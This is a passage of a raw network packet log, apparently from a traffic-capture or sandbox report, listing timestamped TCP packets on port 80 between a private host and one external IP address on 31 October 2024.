                                                                            Oct 31, 2024 20:49:36.403949976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.403961897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.404001951 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.435843945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.436165094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.436178923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.436198950 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.436722994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.436737061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.436780930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.437639952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.437654018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.437695026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.438419104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.438431978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.438443899 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.438453913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.438476086 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.477547884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.477854967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.477866888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.477997065 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.478595018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.478609085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.478634119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.479527950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.479585886 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.521738052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.521847963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.521862030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.521883011 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.522576094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.522588968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.522614002 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.554658890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.554775953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.554781914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.554786921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.554836035 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.555309057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.555325031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.555360079 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.556189060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.556200027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.556227922 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.557015896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.557027102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.557061911 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.557837963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.557847977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.557888985 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.596651077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.596728086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.596739054 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.596795082 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.597939014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.597991943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.598110914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.598121881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.598155975 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.640393019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.640558004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.640568018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.640625000 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.640938997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.640949965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.640989065 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.673316002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.673410892 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.673556089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.673568964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.673612118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.674034119 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.674046040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.674093962 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.674916029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.674927950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.674969912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.675765991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.675776958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.675812960 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.676541090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.676552057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.676594973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.715471029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.715712070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.715723991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.715750933 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.716438055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.716454029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.716473103 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.717093945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.717133999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.717418909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.717431068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.717483997 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.759182930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.759370089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.759378910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.759404898 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.759844065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.759912014 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.792253017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.792493105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.792505026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.792546988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.792948961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.792962074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.792994976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.793452024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.793467999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.793498039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.794337988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.794353008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.794377089 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.795181990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.795197964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.795223951 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.834758997 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.834894896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.834990025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.835001945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.835035086 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.835696936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.835709095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.835763931 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.836359978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.836370945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.836419106 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.837030888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.878334999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.878443003 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.878536940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.878550053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.878735065 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.911215067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.911376953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.911387920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.911444902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.911928892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.911982059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.912293911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.912306070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.912347078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.913018942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.913029909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.913069010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.913749933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.913760900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.913769960 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.913794994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.914473057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.914525986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.954193115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.954430103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.954441071 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.954607964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.955127001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.955138922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.955176115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.956645012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.956655979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.956665993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.956679106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.956706047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.956727028 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.957592010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.957633972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:36.999672890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.999806881 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.999824047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:36.999867916 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.029850006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.029867887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.029930115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.030114889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.030167103 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.030471087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.030483007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.030519009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.030884027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.030896902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.030935049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.032130003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.032143116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.032190084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.032418966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.032429934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.032439947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.032480955 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.072679996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.072813034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.073033094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.073045969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.073082924 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.073343992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.073354006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.073365927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.073406935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.074012041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.074023008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.074065924 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.074606895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.074618101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.074656010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.075273991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.075324059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.119119883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.119360924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.119374037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.119424105 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.149120092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.149250031 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.149259090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.149276018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.149322033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.149769068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.149785995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.149847984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.150757074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.150772095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.150814056 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.151442051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.151458025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.151472092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.151494980 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.152271986 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.152288914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.152319908 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.191414118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.191510916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.191528082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.191637039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.192292929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.192312002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.192372084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.343597889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.343681097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.343698025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.343724012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.344433069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.344449043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.344475031 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.345334053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.345350027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.345380068 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.346113920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.346131086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.346167088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.347007036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.347022057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.347054005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.348229885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.348247051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.348261118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.348273993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.348299026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.348829031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.348845005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.348910093 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.349585056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.349601984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.349642992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.350408077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.350423098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.350466967 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.351048946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.351064920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.351080894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.351102114 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.351718903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.351735115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.351756096 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.356585026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.356626987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.356683969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.356698036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.356738091 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.357165098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.387921095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.387970924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.387976885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.387986898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.388048887 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.388611078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.430202961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.430285931 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.430438995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.430455923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.430489063 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.431057930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.431073904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.431090117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.431102991 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.431725025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.431740999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.431756973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.431777954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.431797981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.463004112 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.463923931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.463974953 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.475753069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.475935936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.475953102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.475984097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.508389950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.508433104 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.508723974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.508740902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.508778095 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.509289026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.509304047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.509339094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.549026012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.549201012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.549217939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.549242973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.549968958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.549987078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.550465107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.550479889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.550491095 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.550503016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.550990105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.551034927 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.594738007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.594913006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.594929934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.594960928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:37.595551014 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.595566988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:37.595685005 CET4974980192.168.2.6185.215.113.16
